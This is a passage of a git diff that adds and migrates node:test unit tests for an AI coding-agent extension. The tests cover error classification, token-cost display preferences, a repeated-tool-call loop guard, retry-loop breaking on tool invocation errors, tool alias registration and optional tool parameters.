+test("V8 JSON.parse: 'Unexpected string' is transient", () => {
+  const result = classifyError("Unexpected string in JSON at position 12");
+  assert.equal(isTransient(result), true);
+  assert.equal(result.kind, "stream");
+});
+
+test("V8 JSON.parse with line/column suffix is transient", () => {
+  const result = classifyError("Unexpected token x in JSON at position 99 (line 3 column 14)");
+  assert.equal(isTransient(result), true);
+  assert.equal(result.kind, "stream");
+});
diff --git a/src/resources/extensions/gsd/tests/token-cost-display.test.ts b/src/resources/extensions/gsd/tests/token-cost-display.test.ts
new file mode 100644
index 000000000..bbd7afc50
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/token-cost-display.test.ts
@@ -0,0 +1,118 @@
+/**
+ * Tests for the show_token_cost preference (#1515).
+ *
+ * Covers:
+ *   - Preference recognition and validation
+ *   - Cost formatting accuracy (inline re-implementation for test isolation)
+ *   - Disabled-by-default behavior
+ *   - Preference parsing from markdown frontmatter
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import {
+  validatePreferences,
+  parsePreferencesMarkdown,
+} from "../preferences.ts";
+import { KNOWN_PREFERENCE_KEYS } from "../preferences-types.ts";
+
+// Re-implement formatPromptCost here for test isolation (avoids pi-coding-agent build dep).
+// The canonical implementation lives in footer.ts.
+function formatPromptCost(cost: number): string {
+  if (cost < 0.001) return `$${cost.toFixed(4)}`;
+  if (cost < 0.01) return `$${cost.toFixed(3)}`;
+  if (cost < 1) return `$${cost.toFixed(3)}`;
+  return `$${cost.toFixed(2)}`;
+}
+
+// ── Preference recognition ──────────────────────────────────────────────────
+
+test("show_token_cost is a known preference key", () => {
+  assert.ok(KNOWN_PREFERENCE_KEYS.has("show_token_cost"));
+});
+
+test("show_token_cost: true validates without errors", () => {
+  const { errors, preferences } = validatePreferences({ show_token_cost: true });
+  assert.equal(errors.length, 0);
+  assert.equal(preferences.show_token_cost, true);
+});
+
+test("show_token_cost: false validates without errors", () => {
+  const { errors, preferences } = validatePreferences({ show_token_cost: false });
+  assert.equal(errors.length, 0);
+  assert.equal(preferences.show_token_cost, false);
+});
+
+test("show_token_cost: non-boolean produces validation error", () => {
+  const { errors } = validatePreferences({ show_token_cost: "yes" as any });
+  assert.ok(errors.length > 0);
+  assert.ok(errors[0].includes("show_token_cost"));
+  assert.ok(errors[0].includes("boolean"));
+});
+
+test("show_token_cost does not produce unknown-key warning", () => {
+  const { warnings } = validatePreferences({ show_token_cost: true });
+  const unknownWarnings = warnings.filter(w => w.includes("show_token_cost"));
+  assert.equal(unknownWarnings.length, 0);
+});
+
+// ── Disabled by default ─────────────────────────────────────────────────────
+
+test("show_token_cost defaults to undefined (disabled) when not set", () => {
+  const { preferences } = validatePreferences({});
+  assert.equal(preferences.show_token_cost, undefined);
+});
+
+test("empty PREFERENCES.md does not enable show_token_cost", () => {
+  const prefs = parsePreferencesMarkdown("---\nversion: 1\n---\n");
+  assert.ok(prefs);
+  assert.equal(prefs.show_token_cost, undefined);
+});
+
+test("PREFERENCES.md with show_token_cost: true enables the preference", () => {
+  const prefs = parsePreferencesMarkdown("---\nshow_token_cost: true\n---\n");
+  assert.ok(prefs);
+  assert.equal(prefs.show_token_cost, true);
+});
+
+// ── Cost formatting ─────────────────────────────────────────────────────────
+
+test("formatPromptCost formats sub-cent amounts with 4 decimals", () => {
+  assert.equal(formatPromptCost(0.0003), "$0.0003");
+  assert.equal(formatPromptCost(0.0009), "$0.0009");
+});
+
+test("formatPromptCost formats cent-range amounts with 3 decimals", () => {
+  assert.equal(formatPromptCost(0.003), "$0.003");
+  assert.equal(formatPromptCost(0.012), "$0.012");
+  assert.equal(formatPromptCost(0.1), "$0.100");
+});
+
+test("formatPromptCost formats dollar-range amounts with 2 decimals", () => {
+  assert.equal(formatPromptCost(1.5), "$1.50");
+  assert.equal(formatPromptCost(12.345), "$12.35");
+});
+
+test("formatPromptCost handles zero", () => {
+  assert.equal(formatPromptCost(0), "$0.0000");
+});
+
+// ── Cost calculation correctness ────────────────────────────────────────────
+
+test("cost calculation formula matches Model cost structure", () => {
+  // Simulates: usage.input * model.cost.input / 1_000_000 + usage.output * model.cost.output / 1_000_000
+  // Model.cost fields are $/million tokens
+  const modelCost = { input: 15, output: 75, cacheRead: 1.5, cacheWrite: 18.75 }; // claude-opus-4 pricing
+  const usage = { input: 2000, output: 500, cacheRead: 10000, cacheWrite: 1000 };
+
+  const cost =
+    (usage.input * modelCost.input / 1_000_000) +
+    (usage.output * modelCost.output / 1_000_000) +
+    (usage.cacheRead * modelCost.cacheRead / 1_000_000) +
+    (usage.cacheWrite * modelCost.cacheWrite / 1_000_000);
+
+  // 2000*15/1M + 500*75/1M + 10000*1.5/1M + 1000*18.75/1M
+  // = 0.03 + 0.0375 + 0.015 + 0.01875 = 0.10125
+  assert.ok(Math.abs(cost - 0.10125) < 0.0001, `Expected ~$0.10125 but got $${cost}`);
+  assert.equal(formatPromptCost(cost), "$0.101");
+});
diff --git a/src/resources/extensions/gsd/tests/tool-call-loop-guard.test.ts b/src/resources/extensions/gsd/tests/tool-call-loop-guard.test.ts
index fbe3e0670..ab82b3a5e 100644
--- a/src/resources/extensions/gsd/tests/tool-call-loop-guard.test.ts
+++ b/src/resources/extensions/gsd/tests/tool-call-loop-guard.test.ts
@@ -3,7 +3,8 @@
 // Verifies that identical consecutive tool calls are detected and blocked
 // after exceeding the threshold, and that the guard resets properly.
 
-import { createTestContext } from './test-helpers.ts';
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
 import {
   checkToolCallLoop,
   resetToolCallLoopGuard,
@@ -11,7 +12,6 @@ import {
   getToolCallLoopCount,
 } from '../bootstrap/tool-call-loop-guard.ts';
 
-const { assertEq, assertTrue, report } = createTestContext();
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Allows first N calls, blocks after threshold
@@ -25,15 +25,15 @@ console.log('\n── Loop guard: blocks after threshold ──');
   // First 4 identical calls should be allowed (threshold is 4)
   for (let i = 1; i <= 4; i++) {
     const result = checkToolCallLoop('web_search', { query: 'same query' });
-    assertTrue(result.block === false, `Call ${i} should be allowed`);
-    assertEq(result.count, i, `Count should be ${i} after call ${i}`);
+    assert.ok(result.block === false, `Call ${i} should be allowed`);
+    assert.deepStrictEqual(result.count, i, `Count should be ${i} after call ${i}`);
   }
 
   // 5th identical call should be blocked
   const blocked = checkToolCallLoop('web_search', { query: 'same query' });
-  assertTrue(blocked.block === true, '5th identical call should be blocked');
-  assertTrue(blocked.reason!.includes('web_search'), 'Reason should mention tool name');
-  assertTrue(blocked.reason!.includes('5'), 'Reason should mention count');
+  assert.ok(blocked.block === true, '5th identical call should be blocked');
+  assert.ok(blocked.reason!.includes('web_search'), 'Reason should mention tool name');
+  assert.ok(blocked.reason!.includes('5'), 'Reason should mention count');
 }
 
 // ═══════════════════════════════════════════════════════════════════════════
@@ -48,17 +48,17 @@ console.log('\n── Loop guard: different calls reset streak ──');
   checkToolCallLoop('web_search', { query: 'query A' });
   checkToolCallLoop('web_search', { query: 'query A' });
   checkToolCallLoop('web_search', { query: 'query A' });
-  assertEq(getToolCallLoopCount(), 3, 'Count should be 3 after 3 identical calls');
+  assert.deepStrictEqual(getToolCallLoopCount(), 3, 'Count should be 3 after 3 identical calls');
 
   // A different call resets the streak
   const different = checkToolCallLoop('bash', { command: 'ls' });
-  assertTrue(different.block === false, 'Different tool call should be allowed');
-  assertEq(getToolCallLoopCount(), 1, 'Count should reset to 1 after different call');
+  assert.ok(different.block === false, 'Different tool call should be allowed');
+  assert.deepStrictEqual(getToolCallLoopCount(), 1, 'Count should reset to 1 after different call');
 
   // Same tool but different args also resets
   checkToolCallLoop('web_search', { query: 'query A' });
   checkToolCallLoop('web_search', { query: 'query B' }); // different args
-  assertEq(getToolCallLoopCount(), 1, 'Different args should reset count');
+  assert.deepStrictEqual(getToolCallLoopCount(), 1, 'Different args should reset count');
 }
 
 // ═══════════════════════════════════════════════════════════════════════════
@@ -72,15 +72,15 @@ console.log('\n── Loop guard: reset clears state ──');
   checkToolCallLoop('web_search', { query: 'q' });
   checkToolCallLoop('web_search', { query: 'q' });
   checkToolCallLoop('web_search', { query: 'q' });
-  assertEq(getToolCallLoopCount(), 3, 'Count should be 3 before reset');
+  assert.deepStrictEqual(getToolCallLoopCount(), 3, 'Count should be 3 before reset');
 
   resetToolCallLoopGuard();
-  assertEq(getToolCallLoopCount(), 0, 'Count should be 0 after reset');
+  assert.deepStrictEqual(getToolCallLoopCount(), 0, 'Count should be 0 after reset');
 
   // After reset, the same call starts fresh
   const result = checkToolCallLoop('web_search', { query: 'q' });
-  assertTrue(result.block === false, 'Call after reset should be allowed');
-  assertEq(getToolCallLoopCount(), 1, 'Count should be 1 after first call post-reset');
+  assert.ok(result.block === false, 'Call after reset should be allowed');
+  assert.deepStrictEqual(getToolCallLoopCount(), 1, 'Count should be 1 after first call post-reset');
 }
 
 // ═══════════════════════════════════════════════════════════════════════════
@@ -94,13 +94,13 @@ console.log('\n── Loop guard: disable allows everything ──');
 
   for (let i = 0; i < 10; i++) {
     const result = checkToolCallLoop('web_search', { query: 'same' });
-    assertTrue(result.block === false, `Call ${i + 1} should be allowed when disabled`);
+    assert.ok(result.block === false, `Call ${i + 1} should be allowed when disabled`);
   }
 
   // Re-enable via reset
   resetToolCallLoopGuard();
   checkToolCallLoop('web_search', { query: 'q' });
-  assertEq(getToolCallLoopCount(), 1, 'Guard should be active again after reset');
+  assert.deepStrictEqual(getToolCallLoopCount(), 1, 'Guard should be active again after reset');
 }
 
 // ═══════════════════════════════════════════════════════════════════════════
@@ -114,8 +114,8 @@ console.log('\n── Loop guard: arg order is normalized ──');
 
   checkToolCallLoop('web_search', { query: 'test', limit: 5 });
   const result = checkToolCallLoop('web_search', { limit: 5, query: 'test' }); // same args, different order
-  assertTrue(result.block === false, 'Same args in different order should count as consecutive');
-  assertEq(getToolCallLoopCount(), 2, 'Should detect as same call regardless of key order');
+  assert.ok(result.block === false, 'Same args in different order should count as consecutive');
+  assert.deepStrictEqual(getToolCallLoopCount(), 2, 'Should detect as same call regardless of key order');
 }
 
 // ═══════════════════════════════════════════════════════════════════════════
@@ -132,21 +132,34 @@ console.log('\n── Loop guard: nested args are not stripped ──');
     const result = checkToolCallLoop('ask_user_questions', {
       questions: [{ id: `q${i}`, question: `Question ${i}?` }],
     });
-    assertTrue(result.block === false, `Nested call ${i} with unique content should be allowed`);
-    assertEq(getToolCallLoopCount(), 1, `Each unique nested call should reset count to 1`);
+    assert.ok(result.block === false, `Nested call ${i} with unique content should be allowed`);
+    assert.deepStrictEqual(getToolCallLoopCount(), 1, `Each unique nested call should reset count to 1`);
   }
 
-  // Truly identical nested calls should still be detected
+  // Truly identical nested calls should still be detected.
+  // ask_user_questions has a strict threshold of 1, so the 2nd identical call is blocked.
   resetToolCallLoopGuard();
-  for (let i = 1; i <= 4; i++) {
-    checkToolCallLoop('ask_user_questions', {
-      questions: [{ id: 'same', question: 'Same?' }],
-    });
-  }
+  const first = checkToolCallLoop('ask_user_questions', {
+    questions: [{ id: 'same', question: 'Same?' }],
+  });
+  assert.ok(first.block === false, 'First ask_user_questions call should be allowed');
   const blocked = checkToolCallLoop('ask_user_questions', {
     questions: [{ id: 'same', question: 'Same?' }],
   });
-  assertTrue(blocked.block === true, 'Identical nested calls should still be blocked');
+  assert.ok(blocked.block === true, '2nd identical ask_user_questions call should be blocked (strict threshold)');
+
+  // Non-strict tools still allow up to 4 identical calls
+  resetToolCallLoopGuard();
+  for (let i = 1; i <= 4; i++) {
+    const r = checkToolCallLoop('web_search', {
+      questions: [{ id: 'same', question: 'Same?' }],
+    });
+    assert.ok(r.block === false, `web_search call ${i} should be allowed (normal threshold)`);
+  }
+  const blockedNormal = checkToolCallLoop('web_search', {
+    questions: [{ id: 'same', question: 'Same?' }],
+  });
+  assert.ok(blockedNormal.block === true, '5th identical web_search call should be blocked');
 }
 
 // ═══════════════════════════════════════════════════════════════════════════
@@ -160,9 +173,7 @@ console.log('\n── Loop guard: nested key order is normalized ──');
 
   checkToolCallLoop('tool', { outer: { b: 2, a: 1 } });
   const result = checkToolCallLoop('tool', { outer: { a: 1, b: 2 } });
-  assertEq(getToolCallLoopCount(), 2, 'Same nested args in different key order should match');
+  assert.deepStrictEqual(getToolCallLoopCount(), 2, 'Same nested args in different key order should match');
 }
 
 // ═══════════════════════════════════════════════════════════════════════════
-
-report();
diff --git a/src/resources/extensions/gsd/tests/tool-invocation-error-loop-break.test.ts b/src/resources/extensions/gsd/tests/tool-invocation-error-loop-break.test.ts
new file mode 100644
index 000000000..5a2cdfa58
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/tool-invocation-error-loop-break.test.ts
@@ -0,0 +1,131 @@
+/**
+ * Regression tests for #2883: gsd_complete_slice tool invocation fails with
+ * JSON truncation, causing stuck retry loop.
+ *
+ * When a GSD tool is invoked with malformed/truncated JSON arguments, the tool
+ * execution fails (isError: true). But postUnitPreVerification only checks if
+ * the expected artifact exists on disk — it does not know the tool itself failed.
+ * When the artifact is missing (because the tool never ran), it sets up
+ * pendingVerificationRetry, re-dispatching the same unit with the same truncated
+ * input, creating a stuck loop.
+ *
+ * The fix adds a `lastToolInvocationError` field to AutoSession. When a GSD tool
+ * execution ends with isError, the error is recorded. postUnitPreVerification
+ * checks this field before retrying — if a tool invocation error occurred, it
+ * pauses auto-mode instead of retrying.
+ */
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { AutoSession } from "../auto/session.ts";
+
+// ─── AutoSession.lastToolInvocationError field ───────────────────────────
+
+describe("#2883: tool invocation error tracking on AutoSession", () => {
+  test("lastToolInvocationError defaults to null", () => {
+    const s = new AutoSession();
+    assert.equal(s.lastToolInvocationError, null);
+  });
+
+  test("lastToolInvocationError is cleared on reset()", () => {
+    const s = new AutoSession();
+    s.lastToolInvocationError = "Validation failed for tool gsd_complete_slice";
+    assert.ok(s.lastToolInvocationError);
+    s.reset();
+    assert.equal(s.lastToolInvocationError, null);
+  });
+
+  test("lastToolInvocationError can store truncated JSON error", () => {
+    const s = new AutoSession();
+    const errorMsg = "Expected ',' or '}' in JSON at position 4096";
+    s.lastToolInvocationError = errorMsg;
+    assert.equal(s.lastToolInvocationError, errorMsg);
+  });
+});
+
+// ─── isToolInvocationError classifier ────────────────────────────────────
+
+import { isToolInvocationError, isQueuedUserMessageSkip } from "../auto-tool-tracking.ts";
+
+describe("#2883: isToolInvocationError classification", () => {
+  test("detects JSON validation failure pattern", () => {
+    assert.equal(
+      isToolInvocationError("Validation failed for tool gsd_complete_slice: Expected ',' or '}' in JSON"),
+      true,
+    );
+  });
+
+  test("detects truncated JSON parse error", () => {
+    assert.equal(
+      isToolInvocationError("Expected ',' or '}' in JSON at position 4096"),
+      true,
+    );
+  });
+
+  test("detects Unexpected end of JSON input", () => {
+    assert.equal(
+      isToolInvocationError("Unexpected end of JSON input"),
+      true,
+    );
+  });
+
+  test("detects Unexpected token in JSON", () => {
+    assert.equal(
+      isToolInvocationError("Unexpected token < in JSON at position 0"),
+      true,
+    );
+  });
+
+  test("detects 'Validation failed for tool' prefix", () => {
+    assert.equal(
+      isToolInvocationError("Validation failed for tool gsd_slice_complete"),
+      true,
+    );
+  });
+
+  test("returns false for normal tool errors (business logic)", () => {
+    assert.equal(
+      isToolInvocationError("Slice S01 is already complete"),
+      false,
+    );
+  });
+
+  test("returns false for empty string", () => {
+    assert.equal(isToolInvocationError(""), false);
+  });
+
+  test("returns false for generic error", () => {
+    assert.equal(isToolInvocationError("Something went wrong"), false);
+  });
+
+  test("returns false for network errors (handled elsewhere)", () => {
+    assert.equal(isToolInvocationError("ECONNRESET"), false);
+  });
+});
+
+// ─── isQueuedUserMessageSkip classifier (#3595) ─────────────────────────
+
+describe("#3595: isQueuedUserMessageSkip classification", () => {
+  test("detects exact skip message with period", () => {
+    assert.equal(isQueuedUserMessageSkip("Skipped due to queued user message."), true);
+  });
+
+  test("detects skip message without period", () => {
+    assert.equal(isQueuedUserMessageSkip("Skipped due to queued user message"), true);
+  });
+
+  test("detects skip message with surrounding whitespace", () => {
+    assert.equal(isQueuedUserMessageSkip("  Skipped due to queued user message.  "), true);
+  });
+
+  test("returns false for normal tool errors", () => {
+    assert.equal(isQueuedUserMessageSkip("Slice S01 is already complete"), false);
+  });
+
+  test("returns false for empty string", () => {
+    assert.equal(isQueuedUserMessageSkip(""), false);
+  });
+
+  test("returns false for partial match (substring)", () => {
+    assert.equal(isQueuedUserMessageSkip("Error: Skipped due to queued user message. Retry later."), false);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/tool-naming.test.ts b/src/resources/extensions/gsd/tests/tool-naming.test.ts
index f8483df1a..a88fc8ac0 100644
--- a/src/resources/extensions/gsd/tests/tool-naming.test.ts
+++ b/src/resources/extensions/gsd/tests/tool-naming.test.ts
@@ -1,13 +1,13 @@
 // tool-naming — Verifies canonical + alias tool registration for GSD DB tools.
 //
-// Each of the 4 DB tools must register under its canonical gsd_concept_action name
-// AND under the old gsd_action_concept name as a backward-compatible alias.
+// Each DB tool must register under its canonical gsd_concept_action name
+// AND under a backward-compatible alias name.
 // The alias must share the exact same execute function reference as the canonical tool.
 
-import { createTestContext } from './test-helpers.ts';
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
 import { registerDbTools } from '../bootstrap/db-tools.ts';
 
-const { assertEq, assertTrue, report } = createTestContext();
 
 // ─── Mock PI ──────────────────────────────────────────────────────────────────
 
@@ -24,8 +24,18 @@ function makeMockPi() {
 const RENAME_MAP: Array<{ canonical: string; alias: string }> = [
   { canonical: "gsd_decision_save", alias: "gsd_save_decision" },
   { canonical: "gsd_requirement_update", alias: "gsd_update_requirement" },
+  { canonical: "gsd_requirement_save", alias: "gsd_save_requirement" },
   { canonical: "gsd_summary_save", alias: "gsd_save_summary" },
   { canonical: "gsd_milestone_generate_id", alias: "gsd_generate_milestone_id" },
+  { canonical: "gsd_task_complete", alias: "gsd_complete_task" },
+  { canonical: "gsd_slice_complete", alias: "gsd_complete_slice" },
+  { canonical: "gsd_plan_milestone", alias: "gsd_milestone_plan" },
+  { canonical: "gsd_plan_slice", alias: "gsd_slice_plan" },
+  { canonical: "gsd_plan_task", alias: "gsd_task_plan" },
+  { canonical: "gsd_replan_slice", alias: "gsd_slice_replan" },
+  { canonical: "gsd_reassess_roadmap", alias: "gsd_roadmap_reassess" },
+  { canonical: "gsd_complete_milestone", alias: "gsd_milestone_complete" },
+  { canonical: "gsd_validate_milestone", alias: "gsd_milestone_validate" },
 ];
 
 // ─── Registration count ──────────────────────────────────────────────────────
@@ -35,7 +45,7 @@ console.log('\n── Tool naming: registration count ──');
 const pi = makeMockPi();
 registerDbTools(pi);
 
-assertEq(pi.tools.length, 8, 'Should register exactly 8 tools (4 canonical + 4 aliases)');
+assert.deepStrictEqual(pi.tools.length, 30, 'Should register exactly 30 tools (14 canonical + 14 aliases + 1 gate tool + 1 gsd_skip_slice)');
 
 // ─── Both names exist for each pair ──────────────────────────────────────────
 
@@ -45,8 +55,8 @@ for (const { canonical, alias } of RENAME_MAP) {
   const canonicalTool = pi.tools.find((t: any) => t.name === canonical);
   const aliasTool = pi.tools.find((t: any) => t.name === alias);
 
-  assertTrue(canonicalTool !== undefined, `Canonical tool "${canonical}" should be registered`);
-  assertTrue(aliasTool !== undefined, `Alias tool "${alias}" should be registered`);
+  assert.ok(canonicalTool !== undefined, `Canonical tool "${canonical}" should be registered`);
+  assert.ok(aliasTool !== undefined, `Alias tool "${alias}" should be registered`);
 }
 
 // ─── Execute function identity ───────────────────────────────────────────────
@@ -58,7 +68,7 @@ for (const { canonical, alias } of RENAME_MAP) {
   const aliasTool = pi.tools.find((t: any) => t.name === alias);
 
   if (canonicalTool && aliasTool) {
-    assertTrue(
+    assert.ok(
       canonicalTool.execute === aliasTool.execute,
       `"${canonical}" and "${alias}" should share the same execute function reference`,
     );
@@ -73,7 +83,7 @@ for (const { canonical, alias } of RENAME_MAP) {
   const aliasTool = pi.tools.find((t: any) => t.name === alias);
 
   if (aliasTool) {
-    assertTrue(
+    assert.ok(
       aliasTool.description.includes(`alias for ${canonical}`),
       `Alias "${alias}" description should include "alias for ${canonical}"`,
     );
@@ -89,7 +99,7 @@ for (const { canonical } of RENAME_MAP) {
 
   if (canonicalTool) {
     const guidelinesText = canonicalTool.promptGuidelines.join(' ');
-    assertTrue(
+    assert.ok(
       guidelinesText.includes(canonical),
       `Canonical tool "${canonical}" promptGuidelines should reference its own name`,
     );
@@ -105,7 +115,7 @@ for (const { canonical, alias } of RENAME_MAP) {
 
   if (aliasTool) {
     const guidelinesText = aliasTool.promptGuidelines.join(' ');
-    assertTrue(
+    assert.ok(
       guidelinesText.includes(`Alias for ${canonical}`),
       `Alias "${alias}" promptGuidelines should say "Alias for ${canonical}"`,
     );
@@ -113,5 +123,3 @@ for (const { canonical, alias } of RENAME_MAP) {
 }
 
 // ═══════════════════════════════════════════════════════════════════════════
-
-report();
diff --git a/src/resources/extensions/gsd/tests/tool-param-optionality.test.ts b/src/resources/extensions/gsd/tests/tool-param-optionality.test.ts
new file mode 100644
index 000000000..6521d1bda
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/tool-param-optionality.test.ts
@@ -0,0 +1,349 @@
+/**
+ * tool-param-optionality — Verifies that enrichment/metadata parameters on
+ * planning and completion tools are optional, not required.
+ *
+ * Models with limited tool-calling capability (e.g. kimi-k2.5, glm-5-turbo)
+ * cannot reliably populate 20+ top-level parameters in a single tool call.
+ * This test ensures that only the core identification and content parameters
+ * are required, while enrichment arrays (patterns, requirements, files, etc.)
+ * are optional — so any model can call the tool successfully.
+ *
+ * See: https://github.com/gsd-build/gsd-2/issues/2771
+ */
+
+import { test } from "node:test";
+import assert from "node:assert/strict";
+import { registerDbTools } from "../bootstrap/db-tools.ts";
+import { Value } from "@sinclair/typebox/value";
+
+// ─── Mock PI ──────────────────────────────────────────────────────────────────
+
+function makeMockPi() {
+  const tools: any[] = [];
+  return {
+    registerTool: (tool: any) => tools.push(tool),
+    tools,
+  } as any;
+}
+
+const pi = makeMockPi();
+registerDbTools(pi);
+
+function getTool(name: string) {
+  return pi.tools.find((t: any) => t.name === name);
+}
+
+// ─── Helper: count required top-level properties ─────────────────────────────
+
+function getRequiredProps(tool: any): string[] {
+  const schema = tool.parameters;
+  return schema.required ?? [];
+}
+
+function getOptionalProps(tool: any): string[] {
+  const schema = tool.parameters;
+  const allProps = Object.keys(schema.properties ?? {});
+  const required = new Set(schema.required ?? []);
+  return allProps.filter((p: string) => !required.has(p));
+}
+
+// ─── gsd_slice_complete: enrichment arrays must be optional ──────────────────
+
+test("gsd_slice_complete — enrichment arrays are optional", () => {
+  const tool = getTool("gsd_slice_complete");
+  assert.ok(tool, "gsd_slice_complete must be registered");
+
+  const required = new Set(getRequiredProps(tool));
+
+  // Core identification and content fields MUST be required
+  const coreRequired = [
+    "sliceId",
+    "milestoneId",
+    "sliceTitle",
+    "oneLiner",
+    "narrative",
+    "verification",
+    "uatContent",
+  ];
+  for (const field of coreRequired) {
+    assert.ok(required.has(field), `core field "${field}" must be required`);
+  }
+
+  // Enrichment/metadata arrays MUST be optional
+  const enrichmentFields = [
+    "keyFiles",
+    "keyDecisions",
+    "patternsEstablished",
+    "observabilitySurfaces",
+    "provides",
+    "requirementsSurfaced",
+    "drillDownPaths",
+    "affects",
+    "requirementsAdvanced",
+    "requirementsValidated",
+    "requirementsInvalidated",
+    "filesModified",
+    "requires",
+    "deviations",
+    "knownLimitations",
+    "followUps",
+  ];
+  for (const field of enrichmentFields) {
+    assert.ok(!required.has(field), `enrichment field "${field}" must be optional, not required`);
+  }
+});
+
+test("gsd_slice_complete — validates with only core params", () => {
+  const tool = getTool("gsd_slice_complete");
+  assert.ok(tool, "gsd_slice_complete must be registered");
+
+  const minimalParams = {
+    sliceId: "S01",
+    milestoneId: "M001",
+    sliceTitle: "Test slice",
+    oneLiner: "Did the thing",
+    narrative: "We did it step by step.",
+    verification: "Tests pass.",
+    uatContent: "## UAT\n- [x] Works",
+  };
+
+  // Should pass schema validation with only core params
+  const errors = [...Value.Errors(tool.parameters, minimalParams)];
+  assert.strictEqual(errors.length, 0, `Minimal params should validate but got errors: ${errors.map(e => `${e.path}: ${e.message}`).join(", ")}`);
+});
+
+// ─── gsd_plan_milestone: enrichment arrays must be optional ──────────────────
+
+test("gsd_plan_milestone — enrichment arrays are optional", () => {
+  const tool = getTool("gsd_plan_milestone");
+  assert.ok(tool, "gsd_plan_milestone must be registered");
+
+  const required = new Set(getRequiredProps(tool));
+
+  // Core fields
+  const coreRequired = ["milestoneId", "title", "vision", "slices"];
+  for (const field of coreRequired) {
+    assert.ok(required.has(field), `core field "${field}" must be required`);
+  }
+
+  // Enrichment fields must be optional
+  const enrichmentFields = [
+    "successCriteria",
+    "keyRisks",
+    "proofStrategy",
+    "verificationContract",
+    "verificationIntegration",
+    "verificationOperational",
+    "verificationUat",
+    "definitionOfDone",
+    "requirementCoverage",
+    "boundaryMapMarkdown",
+  ];
+  for (const field of enrichmentFields) {
+    assert.ok(!required.has(field), `enrichment field "${field}" must be optional, not required`);
+  }
+});
+
+test("gsd_plan_milestone — validates with only core params", () => {
+  const tool = getTool("gsd_plan_milestone");
+  assert.ok(tool, "gsd_plan_milestone must be registered");
+
+  const minimalParams = {
+    milestoneId: "M001",
+    title: "Test milestone",
+    vision: "Build the thing.",
+    slices: [
+      {
+        sliceId: "S01",
+        title: "First slice",
+        risk: "Low",
+        depends: [],
+        demo: "After this, X works",
+        goal: "Set up X",
+        successCriteria: "X is set up",
+        proofLevel: "unit-tests",
+        integrationClosure: "N/A",
+        observabilityImpact: "None",
+      },
+    ],
+  };
+
+  const errors = [...Value.Errors(tool.parameters, minimalParams)];
+  assert.strictEqual(errors.length, 0, `Minimal params should validate but got errors: ${errors.map(e => `${e.path}: ${e.message}`).join(", ")}`);
+});
+
+// ─── gsd_task_complete: enrichment arrays must be optional ───────────────────
+
+test("gsd_task_complete — enrichment arrays are optional", () => {
+  const tool = getTool("gsd_task_complete");
+  assert.ok(tool, "gsd_task_complete must be registered");
+
+  const required = new Set(getRequiredProps(tool));
+
+  // Core fields
+  const coreRequired = [
+    "taskId",
+    "sliceId",
+    "milestoneId",
+    "oneLiner",
+    "narrative",
+    "verification",
+  ];
+  for (const field of coreRequired) {
+    assert.ok(required.has(field), `core field "${field}" must be required`);
+  }
+
+  // Enrichment fields must be optional
+  const enrichmentFields = [
+    "keyFiles",
+    "keyDecisions",
+    "deviations",
+    "knownIssues",
+    "blockerDiscovered",
+    "verificationEvidence",
+  ];
+  for (const field of enrichmentFields) {
+    assert.ok(!required.has(field), `enrichment field "${field}" must be optional, not required`);
+  }
+});
+
+test("gsd_task_complete — validates with only core params", () => {
+  const tool = getTool("gsd_task_complete");
+  assert.ok(tool, "gsd_task_complete must be registered");
+
+  const minimalParams = {
+    taskId: "T01",
+    sliceId: "S01",
+    milestoneId: "M001",
+    oneLiner: "Implemented the feature",
+    narrative: "Created the module and wired it up.",
+    verification: "npm test passes.",
+  };
+
+  const errors = [...Value.Errors(tool.parameters, minimalParams)];
+  assert.strictEqual(errors.length, 0, `Minimal params should validate but got errors: ${errors.map(e => `${e.path}: ${e.message}`).join(", ")}`);
+});
+
+// ─── gsd_complete_milestone: enrichment arrays must be optional ──────────────
+
+test("gsd_complete_milestone — enrichment arrays are optional", () => {
+  const tool = getTool("gsd_complete_milestone");
+  assert.ok(tool, "gsd_complete_milestone must be registered");
+
+  const required = new Set(getRequiredProps(tool));
+
+  // Core fields
+  const coreRequired = [
+    "milestoneId",
+    "title",
+    "oneLiner",
+    "narrative",
+    "verificationPassed",
+  ];
+  for (const field of coreRequired) {
+    assert.ok(required.has(field), `core field "${field}" must be required`);
+  }
+
+  // Enrichment fields must be optional
+  const enrichmentFields = [
+    "successCriteriaResults",
+    "definitionOfDoneResults",
+    "requirementOutcomes",
+    "keyDecisions",
+    "keyFiles",
+    "lessonsLearned",
+  ];
+  for (const field of enrichmentFields) {
+    assert.ok(!required.has(field), `enrichment field "${field}" must be optional, not required`);
+  }
+});
+
+test("gsd_complete_milestone — validates with only core params", () => {
+  const tool = getTool("gsd_complete_milestone");
+  assert.ok(tool, "gsd_complete_milestone must be registered");
+
+  const minimalParams = {
+    milestoneId: "M001",
+    title: "Test milestone",
+    oneLiner: "Finished it.",
+    narrative: "All work completed.",
+    verificationPassed: true,
+  };
+
+  const errors = [...Value.Errors(tool.parameters, minimalParams)];
+  assert.strictEqual(errors.length, 0, `Minimal params should validate but got errors: ${errors.map(e => `${e.path}: ${e.message}`).join(", ")}`);
+});
+
+// ─── gsd_plan_slice: enrichment fields must be optional ──────────────────────
+
+test("gsd_plan_slice — enrichment fields are optional", () => {
+  const tool = getTool("gsd_plan_slice");
+  assert.ok(tool, "gsd_plan_slice must be registered");
+
+  const required = new Set(getRequiredProps(tool));
+
+  // Core fields
+  const coreRequired = ["milestoneId", "sliceId", "goal", "tasks"];
+  for (const field of coreRequired) {
+    assert.ok(required.has(field), `core field "${field}" must be required`);
+  }
+
+  // Enrichment fields
+  const enrichmentFields = [
+    "successCriteria",
+    "proofLevel",
+    "integrationClosure",
+    "observabilityImpact",
+  ];
+  for (const field of enrichmentFields) {
+    assert.ok(!required.has(field), `enrichment field "${field}" must be optional, not required`);
+  }
+});
+
+test("gsd_plan_slice — validates with only core params", () => {
+  const tool = getTool("gsd_plan_slice");
+  assert.ok(tool, "gsd_plan_slice must be registered");
+
+  const minimalParams = {
+    milestoneId: "M001",
+    sliceId: "S01",
+    goal: "Implement feature X",
+    tasks: [
+      {
+        taskId: "T01",
+        title: "Build X",
+        description: "Build the thing",
+        estimate: "2h",
+        files: ["src/x.ts"],
